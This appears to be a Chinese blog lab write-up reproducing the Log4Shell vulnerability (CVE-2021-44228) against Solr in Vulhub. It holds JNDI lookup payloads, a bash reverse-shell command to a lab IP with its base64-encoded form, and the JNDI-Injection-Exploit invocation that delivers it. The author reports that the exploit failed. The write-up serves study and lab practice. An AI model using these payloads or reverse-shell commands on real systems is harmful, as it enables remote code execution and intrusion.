VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了,环境搭建不讲,网上其他文章很好。

访问该环境:

POC

构造(任选其一):

bash 复制代码
 ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}

我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。

访问:

bash 复制代码
http://192.168.220.142:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.rsjlpxqral.dgrh3.cn}

访问之后出现一条dnslog日志:

并且知道了java的版本是1.8.0_102

因为poc里面加了一个查看java版本的命令${sys:java.version},所以讲java版本结果回显在dnslog上面来了。

下面说怎么反弹shell操作:

bash 复制代码
bash -i >& /dev/tcp/192.168.220.142/6666 0>&1

意思是把shell回弹到/192.168.220.142/6666地方

bash编码一下:https://www.sqlsec.com/rce/

bash 复制代码
bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i}

下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i}" -A "http://192.168.220.142/" -C是编码后的内容,-A是反弹shell的ip地址。

注意要先nc监听6666端口

如上图访问

bash 复制代码
http://192.168.220.142:8983/solr/admin/cores?action=${jndi:ldap://192.168.220.142:1099/eftobp}

额 不知道为啥子没成功。。。。。

然后看了看其他人的文章发现:

就这样吧,反正搞懂了过程,也知道实战中怎么利用了。

而且我的环境是java1.8,真搞不懂

下面来看下原理吧:

bash 复制代码
Log4j→Log for Java,Apache的开源日志记录组件

JDK→1.8u21以下的版本

看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143

相关推荐
Welcome_Back2 小时前
SpringBoot后端开发测试全指南
spring boot·后端·log4j
kkkkkkkkl241 天前
Prompt 不只是提问:大模型的“输入程序”机制解析
log4j
de_wizard2 天前
Spring Boot 项目开发流程全解析
java·spring boot·log4j
阿蒙Amon2 天前
C#常用类库-详解Moq
开发语言·c#·log4j
steel80883 天前
Spring Boot 整合 log4j2 日志配置教程
spring boot·单元测试·log4j
Sombra_Olivia3 天前
Vulhub 中的 adminer CVE-2021-21311
安全·web安全·网络安全·渗透测试·vulhub
互联网散修3 天前
零基础鸿蒙应用开发第六节:复杂数据类型入门 —— 数组、元组与枚举
华为·log4j·harmonyos
江沉晚呤时4 天前
C# 接口默认实现与依赖注入实战指南:.NET 9 企业级开发高级技巧
c#·log4j·.net·.netcore
小璐资源网5 天前
单元测试中应对外部服务依赖的实践指南
单元测试·log4j
萝卜白菜。9 天前
在windows平台下log4j日志输出很多数字
log4j